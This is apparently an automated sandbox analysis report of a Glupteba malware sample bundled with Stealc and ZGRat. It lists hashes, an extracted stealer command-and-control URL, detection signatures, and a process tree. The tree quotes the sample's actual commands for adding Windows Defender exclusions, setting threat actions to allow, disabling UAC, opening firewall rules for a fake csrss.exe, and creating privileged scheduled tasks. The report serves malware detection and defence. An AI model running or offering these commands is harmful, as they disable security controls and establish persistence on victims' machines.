glupteba | 2dd429b06b920140fe9186608b47d7d80697191b089117769912d81f6c39ff38

Analysis

max time kernel
67s
max time network
103s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
06-05-2024 05:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2dd429b06b920140fe9186608b47d7d80697191b089117769912d81f6c39ff38.exe
Size

392KB
MD5

ccc754d02cc1188f0a0477b306539065
SHA1

8a73b2e84fbdcadfaa98cc325c2222096bdc309b
SHA256

2dd429b06b920140fe9186608b47d7d80697191b089117769912d81f6c39ff38
SHA512

6cabd1b19ddd94280528e4c2512e222bacc9bea6806e1df5610ffd3d993f52c4599e65fc7573d3d426e4d6d8c3756244e3e242b55b499796222f971b15ca8e0a
SSDEEP

6144:htbMqLyDywnR6E5qkDPWQo9f+1llNEaVl5CMba/W1i5adCexXadKxQ3qhqrS8PbH:ht4qLC7RFfT7Ew5Csfi5advxaVkk

Score

10^/10

glupteba stealc zgrat dropper evasion execution loader rat stealer themida trojan

Malware Config

Extracted

Family

stealc

http://185.172.128.150

Attributes

url_path
/c698e1bc8a2f5e6d.php

Signatures

Detect ZGRat V1 3 IoCs

resource	yara_rule
behavioral2/memory/1364-1985-0x0000022E13490000-0x0000022E16D88000-memory.dmp	family_zgrat_v1
behavioral2/memory/1364-2067-0x0000022E18B30000-0x0000022E18B54000-memory.dmp	family_zgrat_v1
behavioral2/memory/1364-2058-0x0000022E31540000-0x0000022E31650000-memory.dmp	family_zgrat_v1

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba payload 20 IoCs

resource	yara_rule
behavioral2/memory/2808-886-0x0000000000400000-0x0000000001DF2000-memory.dmp	family_glupteba
behavioral2/memory/1408-1143-0x0000000000400000-0x0000000001DF2000-memory.dmp	family_glupteba
behavioral2/memory/2528-1289-0x0000000000400000-0x0000000001DF2000-memory.dmp	family_glupteba
behavioral2/memory/4432-1291-0x0000000000400000-0x0000000001DF2000-memory.dmp	family_glupteba
behavioral2/memory/2528-1358-0x0000000000400000-0x0000000001DF2000-memory.dmp	family_glupteba
behavioral2/memory/4432-1376-0x0000000000400000-0x0000000001DF2000-memory.dmp	family_glupteba
behavioral2/memory/3684-1827-0x0000000000400000-0x0000000001DF2000-memory.dmp	family_glupteba
behavioral2/memory/3336-1826-0x0000000000400000-0x0000000001DF2000-memory.dmp	family_glupteba
behavioral2/memory/3336-2249-0x0000000000400000-0x0000000001DF2000-memory.dmp	family_glupteba
behavioral2/memory/3684-2905-0x0000000000400000-0x0000000001DF2000-memory.dmp	family_glupteba
behavioral2/memory/4044-2907-0x0000000000400000-0x0000000001DF2000-memory.dmp	family_glupteba
behavioral2/memory/1420-2906-0x0000000000400000-0x0000000001DF2000-memory.dmp	family_glupteba
behavioral2/memory/3336-3030-0x0000000000400000-0x0000000001DF2000-memory.dmp	family_glupteba
behavioral2/memory/3684-3921-0x0000000000400000-0x0000000001DF2000-memory.dmp	family_glupteba
behavioral2/memory/4044-3923-0x0000000000400000-0x0000000001DF2000-memory.dmp	family_glupteba
behavioral2/memory/1420-3922-0x0000000000400000-0x0000000001DF2000-memory.dmp	family_glupteba
behavioral2/memory/3336-4174-0x0000000000400000-0x0000000001DF2000-memory.dmp	family_glupteba
behavioral2/memory/3684-4459-0x0000000000400000-0x0000000001DF2000-memory.dmp	family_glupteba
behavioral2/memory/4044-4510-0x0000000000400000-0x0000000001DF2000-memory.dmp	family_glupteba
behavioral2/memory/1420-4494-0x0000000000400000-0x0000000001DF2000-memory.dmp	family_glupteba

Stealc
Stealc is an infostealer written in C++.
stealer stealc

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	2dd429b06b920140fe9186608b47d7d80697191b089117769912d81f6c39ff38.exe

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

Command and Scripting Interpreter: PowerShell 1 TTPs 27 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
4188	powershell.exe
4940	powershell.exe
396	powershell.exe
3876	powershell.exe
6024	powershell.exe
3456	powershell.exe
4988	powershell.EXE
4604	powershell.exe
5108	powershell.exe
1788	powershell.exe
5128	powershell.exe
5360	powershell.exe
5540	powershell.exe
4820	powershell.exe
1036	powershell.exe
5528	powershell.exe
4268	powershell.exe
5472	powershell.exe
1576	powershell.exe
220	powershell.exe
820	powershell.exe
5472	powershell.exe
5796	powershell.exe
4660	powershell.exe
4992	powershell.exe
5332	powershell.exe
1604	powershell.exe

Downloads MZ/PE file

Modifies Windows Firewall 2 TTPs 4 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
5620	netsh.exe
2692	netsh.exe
3440	netsh.exe
5448	netsh.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nQ9vDKxnBpRMOWvQl2nqwKL1.bat	regsvcs.exe

Themida packer 4 IoCs

Detects Themida, an advanced Windows software protection system.

themida

resource	yara_rule
behavioral2/files/0x000800000001ab89-678.dat	themida
behavioral2/memory/2164-684-0x0000000140000000-0x0000000140861000-memory.dmp	themida
behavioral2/memory/2164-1296-0x0000000140000000-0x0000000140861000-memory.dmp	themida
behavioral2/memory/2164-1825-0x0000000140000000-0x0000000140861000-memory.dmp	themida

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	2dd429b06b920140fe9186608b47d7d80697191b089117769912d81f6c39ff38.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	2dd429b06b920140fe9186608b47d7d80697191b089117769912d81f6c39ff38.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
2	pastebin.com
3	pastebin.com

Looks up external IP address via web service 4 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
55	api.myip.com
56	ipinfo.io
58	ipinfo.io
54	api.myip.com

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2916 set thread context of 2392	2916	2dd429b06b920140fe9186608b47d7d80697191b089117769912d81f6c39ff38.exe	76

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 4 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
4980	schtasks.exe
4308	schtasks.exe
5380	schtasks.exe
5212	schtasks.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
1604	powershell.exe
1604	powershell.exe
1604	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2916	2dd429b06b920140fe9186608b47d7d80697191b089117769912d81f6c39ff38.exe
Token: SeDebugPrivilege	1604	powershell.exe
Token: SeDebugPrivilege	2392	regsvcs.exe

Suspicious use of WriteProcessMemory 10 IoCs

description	pid	Process	procid_target
PID 2916 wrote to memory of 1604	2916	2dd429b06b920140fe9186608b47d7d80697191b089117769912d81f6c39ff38.exe	74
PID 2916 wrote to memory of 1604	2916	2dd429b06b920140fe9186608b47d7d80697191b089117769912d81f6c39ff38.exe	74
PID 2916 wrote to memory of 2392	2916	2dd429b06b920140fe9186608b47d7d80697191b089117769912d81f6c39ff38.exe	76
PID 2916 wrote to memory of 2392	2916	2dd429b06b920140fe9186608b47d7d80697191b089117769912d81f6c39ff38.exe	76
PID 2916 wrote to memory of 2392	2916	2dd429b06b920140fe9186608b47d7d80697191b089117769912d81f6c39ff38.exe	76
PID 2916 wrote to memory of 2392	2916	2dd429b06b920140fe9186608b47d7d80697191b089117769912d81f6c39ff38.exe	76
PID 2916 wrote to memory of 2392	2916	2dd429b06b920140fe9186608b47d7d80697191b089117769912d81f6c39ff38.exe	76
PID 2916 wrote to memory of 2392	2916	2dd429b06b920140fe9186608b47d7d80697191b089117769912d81f6c39ff38.exe	76
PID 2916 wrote to memory of 2392	2916	2dd429b06b920140fe9186608b47d7d80697191b089117769912d81f6c39ff38.exe	76
PID 2916 wrote to memory of 2392	2916	2dd429b06b920140fe9186608b47d7d80697191b089117769912d81f6c39ff38.exe	76

System policy modification 1 TTPs 1 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	2dd429b06b920140fe9186608b47d7d80697191b089117769912d81f6c39ff38.exe

C:\Users\Admin\AppData\Local\Temp\2dd429b06b920140fe9186608b47d7d80697191b089117769912d81f6c39ff38.exe
"C:\Users\Admin\AppData\Local\Temp\2dd429b06b920140fe9186608b47d7d80697191b089117769912d81f6c39ff38.exe"
1⤵
- UAC bypass
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2916
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\2dd429b06b920140fe9186608b47d7d80697191b089117769912d81f6c39ff38.exe" -Force
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1604
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
  2⤵
  - Drops startup file
  - Suspicious use of AdjustPrivilegeToken
  PID:2392
- - C:\Users\Admin\Pictures\AIkKgSqnXFNys1TVNCAX8jCk.exe
    "C:\Users\Admin\Pictures\AIkKgSqnXFNys1TVNCAX8jCk.exe"
    3⤵
    PID:1756
  - - C:\Users\Admin\AppData\Local\Temp\u1cs.0.exe
      "C:\Users\Admin\AppData\Local\Temp\u1cs.0.exe"
      4⤵
      PID:4636
  - - C:\Users\Admin\AppData\Local\Temp\u1cs.1.exe
      "C:\Users\Admin\AppData\Local\Temp\u1cs.1.exe"
      4⤵
      PID:772
    - - C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
        5⤵
        
        PID:1364
- - C:\Users\Admin\Pictures\cZ8ISRgNYFRrEz55eI5Jq3Xo.exe
    "C:\Users\Admin\Pictures\cZ8ISRgNYFRrEz55eI5Jq3Xo.exe"
    3⤵
    PID:2808
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:5108
  - - C:\Users\Admin\Pictures\cZ8ISRgNYFRrEz55eI5Jq3Xo.exe
      "C:\Users\Admin\Pictures\cZ8ISRgNYFRrEz55eI5Jq3Xo.exe"
      4⤵
      PID:3336
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1576
    - - C:\Windows\System32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        5⤵
        
        PID:1688
      - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        6⤵
        Modifies Windows Firewall
        
        PID:2692
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1036
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5540
    - - C:\Windows\rss\csrss.exe
        
        C:\Windows\rss\csrss.exe
        5⤵
        
        PID:5140
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5796
      - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        6⤵
        Creates scheduled task(s)
        
        PID:5380
      - C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /delete /tn ScheduledUpdate /f
        6⤵
        
        PID:5124
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4268
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5472
- - C:\Users\Admin\Pictures\AIqzlPM3watpUfAzQJNhpULX.exe
    "C:\Users\Admin\Pictures\AIqzlPM3watpUfAzQJNhpULX.exe"
    3⤵
    PID:1408
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:4604
  - - C:\Users\Admin\Pictures\AIqzlPM3watpUfAzQJNhpULX.exe
      "C:\Users\Admin\Pictures\AIqzlPM3watpUfAzQJNhpULX.exe"
      4⤵
      PID:3684
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4820
    - - C:\Windows\System32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        5⤵
        
        PID:4236
      - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        6⤵
        Modifies Windows Firewall
        
        PID:3440
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5528
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4992
- - C:\Users\Admin\Pictures\LbaaTACpH1mS6IjhCeRFiYRc.exe
    "C:\Users\Admin\Pictures\LbaaTACpH1mS6IjhCeRFiYRc.exe"
    3⤵
    PID:2528
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:1788
  - - C:\Users\Admin\Pictures\LbaaTACpH1mS6IjhCeRFiYRc.exe
      "C:\Users\Admin\Pictures\LbaaTACpH1mS6IjhCeRFiYRc.exe"
      4⤵
      PID:1420
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:820
    - - C:\Windows\System32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        5⤵
        
        PID:6128
      - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        6⤵
        Modifies Windows Firewall
        
        PID:5448
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5128
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5472
- - C:\Users\Admin\Pictures\HWzy6naVwqeHdqoKqA1J08w0.exe
    "C:\Users\Admin\Pictures\HWzy6naVwqeHdqoKqA1J08w0.exe"
    3⤵
    PID:4432
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -nologo -noprofile
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:4660
  - - C:\Users\Admin\Pictures\HWzy6naVwqeHdqoKqA1J08w0.exe
      "C:\Users\Admin\Pictures\HWzy6naVwqeHdqoKqA1J08w0.exe"
      4⤵
      PID:4044
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:220
    - - C:\Windows\System32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        5⤵
        
        PID:5884
      - C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        6⤵
        Modifies Windows Firewall
        
        PID:5620
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5360
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5332
- - C:\Users\Admin\Pictures\LVmZXT5zDsu7xf1VLkiiV3Np.exe
    "C:\Users\Admin\Pictures\LVmZXT5zDsu7xf1VLkiiV3Np.exe"
    3⤵
    PID:2164
- - C:\Users\Admin\Pictures\zRejBmjvGS6usRS1r1NrX0kH.exe
    "C:\Users\Admin\Pictures\zRejBmjvGS6usRS1r1NrX0kH.exe"
    3⤵
    PID:4948
  - - C:\Users\Admin\AppData\Local\Temp\7zS328.tmp\Install.exe
      .\Install.exe /ThYFdiduvbI "385118" /S
      4⤵
      PID:4632
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        5⤵
        
        PID:3228
      - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
        6⤵
        
        PID:504
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        7⤵
        
        PID:2956
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        8⤵
        
        PID:872
      - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
        6⤵
        
        PID:4672
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        7⤵
        
        PID:816
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        8⤵
        
        PID:4604
      - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
        6⤵
        
        PID:3880
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        7⤵
        
        PID:4940
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        8⤵
        
        PID:5572
      - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
        6⤵
        
        PID:5920
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        7⤵
        
        PID:5944
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        8⤵
        
        PID:6000
      - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        6⤵
        
        PID:5424
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
        7⤵
        
        PID:5504
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4188
        
        C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        9⤵
        
        PID:3760
    - - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        5⤵
        
        PID:5280
      - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        6⤵
        
        PID:5480
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4940
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        8⤵
        
        PID:4112
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 05:03:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS328.tmp\Install.exe\" it /lMWdidrdkU 385118 /S" /V1 /F
        5⤵
        Creates scheduled task(s)
        
        PID:5212
    - - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
        5⤵
        
        PID:4264
      - C:\Windows\SysWOW64\cmd.exe
        
        /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        6⤵
        
        PID:4036
        
        \??\c:\windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
        7⤵
        
        PID:5344
- - C:\Users\Admin\Pictures\lrUVDNIp8vcrqcQb2jANGTaa.exe
    "C:\Users\Admin\Pictures\lrUVDNIp8vcrqcQb2jANGTaa.exe"
    3⤵
    PID:5624
  - - C:\Users\Admin\AppData\Local\Temp\7zS15A6.tmp\Install.exe
      .\Install.exe /ThYFdiduvbI "385118" /S
      4⤵
      PID:2692
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
        5⤵
        
        PID:5868
      - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
        6⤵
        
        PID:2832
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        7⤵
        
        PID:5520
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        8⤵
        
        PID:5608
      - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
        6⤵
        
        PID:5168
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        7⤵
        
        PID:3148
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        8⤵
        
        PID:6104
      - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
        6⤵
        
        PID:5940
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        7⤵
        
        PID:5996
        
        \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        8⤵
        
        PID:4600
      - C:\Windows\SysWOW64\forfiles.exe
        
        forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
        6⤵
        
        PID:6004
        
        C:\Windows\SysWOW64\cmd.exe
        
